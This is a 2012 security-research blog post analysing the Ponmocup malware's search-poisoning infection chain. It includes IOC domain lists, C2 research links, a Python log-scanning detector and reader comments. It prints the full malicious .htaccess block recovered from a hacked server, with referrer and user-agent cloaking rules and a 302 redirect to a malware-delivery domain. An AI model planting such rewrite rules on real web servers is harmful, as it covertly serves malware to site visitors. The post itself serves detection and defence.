Thursday, March 8, 2012

Ponmocup, lots changed, but not all

Updated on 2012-03-09 (see at the end and list of domains below)

Updated on 2012-03-15 (list of domains below)

Updated on 2012-04-14 (more info, links to IOC and ref's at end)

So here goes another post about the Ponmocup malware. Lots of things changed recently, but not all (luckily for defenders).

First, for those who are not yet familiar with the infection steps, here is a quick overview. A user searches for something using a web search engine, e.g. Google, and clicks on a link leading to an infected website. The infection is not planted in individual pages as (obfuscated) scripts; instead the ".htaccess" file on the webserver has been modified. It checks the referrer and the user-agent of the visitor and, if the checks pass, sends back a 302 redirect and sets a cookie. The intermediate redirection server sends back another 302 redirect to yet another server, which delivers the malware executable. It's an EXE or COM file with the search query terms as its filename.

Previously, the first redirection step used a "/cgi-bin/r.cgi" pattern, which was detected by Snort rule 2013181. Here's an example from 2011-08-03.

Just recently I discovered that this pattern has been changed since at least 2012-01-24. The first redirection now looks very much like the one from a Google search result (/url?sa=...). Here's an example of the new infection pattern from 2012-03-07. (Sample with pwd "infected")

I submitted the sample to VT and some online analysis services. Here's a GFI Sandbox report [PDF]. As you can see in this report, lots of indicators are still the same (although some are randomized). The registry key mentioned in my previous post is still set; that remains one constant (and easy) indicator for detecting an infection. The hosts file doesn't seem to be changed anymore.

The C2 traffic after an infection has changed a lot, too, so most of the old Snort rules won't detect it anymore.
Here's some "OSINT research" I did in late November last year:
http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/C2-domains-IPs-MD5-date.txt
http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/C2-traffic-domains-more-details-full.txt
http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/C2-traffic-more-details-full.txt

For more details about previous research please see the main page, and excuse the bad formatting (I just wanted to put that info somewhere fast and quick).

Now if you were just looking for some new network indicators, here's a list of observed malware redirect domains and IPs:


Thanks Kenneth (@Patories / blog) for adding to this list! (added 2012-03-09)


added 2012-03-15:

*.stephanized.info / 176.53.112.107

*.b12capitalpartners.com / 109.236.80.187

The previous lists of domains have not been updated with new ones (yet).
http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/Ponmocup-Domains-History_2012-02-20.txt
http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/Ponmocup-Domains-IPs_2012-02-20.html

Now who will create some snort rules or IOCs out of this?

Let's go ;-)

Updated on 2012-03-09:

First let me clear something up. The infection does not exploit any vulnerability, except the "human" one via social engineering. The user searching for some query terms is lured into opening the downloaded malware executable because the query terms appear in the file name. So fully patched Windows systems are vulnerable as long as executable files can be downloaded from the Internet.

The user does not need admin privileges on the system to get infected. For non-admins, "only" the current user running the malware executable gets infected.

Now let's take another look at the first step of the infection: the redirection URLs from the infected ".htaccess" file on a hacked webserver. I believe the .htaccess files are manipulated using stolen (FTP or other) logins to these webservers.

I got hold of such a .htaccess file and located the malicious "code". The 33 lines of code are well hidden in the middle of the more than 3,000-line file, which is really hard to find ;-) (end of sarcasm)

$ wc -l htaccess.txt
3094 htaccess.txt

$ egrep -n " " htaccess.txt | wc -l
33

$ egrep -n " " htaccess.txt
1513:
1515:RewriteEngine On
1517:RewriteCond %{REQUEST_METHOD} ^GET$
1519:RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(wordpresstwittweetflickr\.linkedingoogle\.yahoo\.bing\.msn\.ask\.excite\.altavista\.netscape\.aol\.hotbot\.goto\.infoseek\.mamma\.alltheweb\.lycos\.metacrawler\.mail\.dogpile\?).*$ [NC]
1521:RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]
1523:RewriteCond %{HTTP_USER_AGENT} !^.*(bingAccoonaAce\sExplorerAmfibiAmiga\sOSapacheappieAppleSyndication).*$ [NC]
1525:RewriteCond %{HTTP_USER_AGENT} !^.*(ArchiveArgusAsk\sJeevesasteriasAtrenko\sNewsBeOSBigBlogZoo).*$ [NC]
1527:RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360BlaizBloglinesBlogPulseBlogSearchBlogsLiveBlogsSayblogWatcher).*$ [NC]
1529:RewriteCond %{HTTP_USER_AGENT} !^.*(BookmarkbotCE\-PreloadCFNetworkcococCombineCrawlcurlDanger\shiptop).*$ [NC]
1531:RewriteCond %{HTTP_USER_AGENT} !^.*(DiagnosticsDTAAgentEmeraldShieldendoEvaalEverest\-Vulcan).*$ [NC]
1533:RewriteCond %{HTTP_USER_AGENT} !^.*(exactseekFeedFetchfindlinksFreeBSDFriendsterFuck\sYouGoogle).*$ [NC]
1535:RewriteCond %{HTTP_USER_AGENT} !^.*(GregariusHatenaScreenshotheritrixHolyCowDudeHonda\-SearchHP\-UX).*$ [NC]
1537:RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPGHttpClienthttpunitichiroiGetteriPhoneIRIXJakartaJetBrains).*$ [NC]
1539:RewriteCond %{HTTP_USER_AGENT} !^.*(KrugleLabradorlarbinLeechGetlibwwwLifereaLinkChecker).*$ [NC]
1541:RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurfLinuxLiveJournalLonoponoLotus\-NotesLycosLynxMac\_PowerPC).*$ [NC]
1543:RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPCMac\s10Mac\sOSmacDNMacintoshMediapartnersMegiteMetaProducts).*$ [NC]
1545:RewriteCond %{HTTP_USER_AGENT} !^.*(MivaMobileNetBSDNetNewsWireNetResearchServerNewsAlloyNewsFire).*$ [NC]
1547:RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnlineNewsMacProNokiaNuSearchNutchObjectSearchOctora).*$ [NC]
1549:RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorerOmnipelagosOnetOpenBSDOpenIntelligenceDataoreilly).*$ [NC]
1551:RewriteCond %{HTTP_USER_AGENT} !^.*(os\=MacP900ipanscientperlPlayStationPOE\-ComponentPrivacyFinder).*$ [NC]
1553:RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclonePythonretrieverRojoRSSSBIderScooterSeekerSeries\s60).*$ [NC]
1555:RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReaderSiteBarSlurpSnoopySoap\sClientSocialmarksSphere\sScout).*$ [NC]
1557:RewriteCond %{HTTP_USER_AGENT} !^.*(spidersprooseRamblerStrawsubscriberSunOSSurferSyndic8).*$ [NC]
1559:RewriteCond %{HTTP_USER_AGENT} !^.*(SyntryxTargetYourNewsTechnoratiThunderbirdTwicelerurllibValidator).*$ [NC]
1561:RewriteCond %{HTTP_USER_AGENT} !^.*(ViennavoyagerW3CWavefirewebcollageWebmasterWebPatrolwgetWin\s9x).*$ [NC]
1563:RewriteCond %{HTTP_USER_AGENT} !^.*(Win16Win95Win98Windows\s95Windows\s98Windows\sCEWindows\sNT\s4).*$ [NC]
1565:RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTPWinNT4WordPressWWWeaselwwwsteryacyYahoo).*$ [NC]
1567:RewriteCond %{HTTP_USER_AGENT} !^.*(YandexYetiYouReadMeZhuaxiaZyBorg).*$ [NC]
1569:RewriteCond %{REQUEST_FILENAME} !.*jpg$.*gif$.*png.*jpeg.*mpg.*avi.*zip.*gz.*tar.*ico$ [NC]
1571:RewriteCond %{HTTP_COOKIE} !^.*ejJ.*$ [NC]
1573:RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
1575:RewriteCond %{HTTPS} ^off$
1577:RewriteRule ^(.*)$ http://%{REMOTE_PORT}.puritanhardrive.com/url?sa=X&source=web&cd=39&ved=0FLFQWdF5&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=2ZItfKzI4Ki3pI2JzVAz9Je1pw==&usg=pyT9z9Cp7DU5572d38ywx9&sig2=bDduChtXGT22SxV5UI2D8H [R=302,L,CO=ejJ:43:%{HTTP_HOST}:10549:/:0:HttpOnly]

As you can see (and as mostly mentioned before), the referrer, user-agent and cookie are checked, and only if all conditions match is the redirection to the malware server sent back. Note that the RewriteRule also sets the "ejJ" cookie (the CO= flag) which the RewriteCond on HTTP_COOKIE then excludes, so a visitor is only redirected once; a second visit from the same browser will not reproduce the redirect.

The malware domain and the parameters of the redirection URL (sa, source, cd, ved, url, ei, usg, sig2) are random for each infected webserver, but constant on a given server for every redirect (except for the "url" parameter). Samples are in this list.

A new discovery is that the subdomain of the redirection domains (the part shown as "*." in the list of domains above) is the source port of the visitor's TCP connection (%{REMOTE_PORT} in the RewriteRule) and thus should be between 1025 and 65535. So looking for 4-5 digit subdomains could help discover such redirection domains that are not yet known or registered.
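As an added example (not code from the original post), here is a Python script that scans constructed proxy-log lines for the redirect pattern described above, and answers the earlier question of turning this into an IOC: a 302 to a "/url?sa=..." Location that carries the full parameter set (sa, source, cd, ved, url, ei, usg, sig2) but points at a host that is not a search engine, with a numeric subdomain in the ephemeral-port range as the strongest signal. The log format, the ".invalid" domains and the list of search-engine labels are assumptions; the first Location is modelled on the RewriteRule above, and the heuristic also catches redirect domains not in the list.

```python
from urllib.parse import urlsplit, parse_qs

# Parameters the fake "/url?sa=..." redirect carries on every infected server.
REDIRECT_PARAMS = {"sa", "source", "cd", "ved", "url", "ei", "usg", "sig2"}
# Assumption: labels that identify a genuine search-engine host (extend to taste).
SEARCH_LABELS = {"google", "bing", "yahoo"}

def is_ponmocup_redirect(location):
    """Return a short reason if `location` looks like a Ponmocup redirect, else None."""
    parts = urlsplit(location)
    host = parts.hostname or ""
    labels = host.split(".")
    # Only the search-result look-alike path with the full parameter set is of interest.
    if parts.path != "/url" or not REDIRECT_PARAMS.issubset(parse_qs(parts.query)):
        return None
    # A real search engine may legitimately send /url?sa=... click-throughs.
    if SEARCH_LABELS & set(labels):
        return None
    sub = labels[0]
    # The .htaccess rule puts %{REMOTE_PORT} in the subdomain: an ephemeral port, 1025-65535.
    if sub.isdigit() and 1025 <= int(sub) <= 65535:
        return "fake search redirect, source-port subdomain %s on %s" % (sub, host)
    return "fake search redirect on non-search host %s" % host

def scan_proxy_log(text):
    """Scan 'client requested_url status location' lines; return (client, site, reason) hits."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 4 or fields[2] != "302":
            continue
        client, requested, _status, location = fields
        reason = is_ponmocup_redirect(location)
        if reason:
            hits.append((client, urlsplit(requested).hostname, reason))
    return hits

# Constructed sample log (not from the post); the first Location mirrors the .htaccess RewriteRule.
SAMPLE_LOG = """\
10.0.0.5 http://hacked-site.invalid/page.html 302 http://52211.puritanhardrive.com/url?sa=X&source=web&cd=39&ved=0FLFQWdF5&url=http://hacked-site.invalid/page.html&ei=2ZItfKzI4Ki3pI2JzVAz9Je1pw==&usg=pyT9z9Cp7DU5572d38ywx9&sig2=bDduChtXGT22SxV5UI2D8H
10.0.0.6 http://hacked-site.invalid/about 302 http://www.google.com/url?sa=t&source=web&cd=1&url=http://hacked-site.invalid/about
10.0.0.7 http://hacked-site.invalid/ 200 -
10.0.0.8 http://hacked-site.invalid/x 302 http://1337.not-yet-listed.invalid/url?sa=X&source=web&cd=5&ved=a1&url=http://hacked-site.invalid/x&ei=b2&usg=c3&sig2=d4
10.0.0.9 http://hacked-site.invalid/y 302 http://www.not-yet-listed.invalid/url?sa=X&source=web&cd=5&ved=a1&url=http://hacked-site.invalid/y&ei=b2&usg=c3&sig2=d4
"""
```

Running scan_proxy_log(SAMPLE_LOG) flags the first, fourth and fifth lines, and reports the source-port subdomain for the first two of them.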

If you find this info useful, spread the word (or link) ;-)

Updated on 2012-04-14

Lots of A/V products seem very ineffective at detecting this malware. Check out this analysis from a couple of months ago:
http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/ponmocup-analysis_2012-02-18.html
http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/analysis_2012-03-07.txt

Checking for a couple of registry keys should be an easy way to detect infected systems. Here's an IOC that should do this:
http://ioc.forensicartifacts.com/2012/04/ponmocup-2/
https://forums.mandiant.com/topic/ioc-request-for-ponmocup-malware-botnet

I would be really interested to hear if you get hits (positive or false) on this IOC. Thanks for any feedback.

4 comments:

  1. You sir are a life saver. We have been having some trouble with our webpage redirecting to some malware sites for a couple of months and we couldn't find where the problem was. Until I found this article, thank you so much.

    1. Thank you Saito Waru for kind comment :)

  2. Thank you but I wasn't clear ... If I had this, would there be malware download by my website via exploited .htaccess to my site's visitors' computers?

  3. Cory,

    all visitors to your site using a search engine would be served a malware executable (from another server, not yours). If the user opened the malware exe it would infect his computer and download further malware from other servers.
    So yes, as long as this .htaccess file was on your webserver, your visitors (from search engines) were exposed to malware.
    (Important note: this malware is not exploiting a vulnerability in browser plugins as lots of exploit kits for drive-by infections do. It's using social engineering, naming the malware with the search query words. So it can infect a fully patched system with non-admin user as well!)

    You can check this yourself using an online service:

    http://urlquery.net/
    (click "advanced settings")
    Profile URL: http://www.your-website.com/
    Referrer: http://www.google.ch/url?q=random+search-terms

    http://wepawet.iseclab.org/
    is another service where you could do the same (incl. Referrer).

    If you're a little tech savvy you could do the same using WGET as shown here:
    http://www9.dyndns-server.com:8080/pub/botnet/ponmocup/analysis_2012-03-07.txt

    On either one you could see the redirect to some malware serving URL as described in my blog.
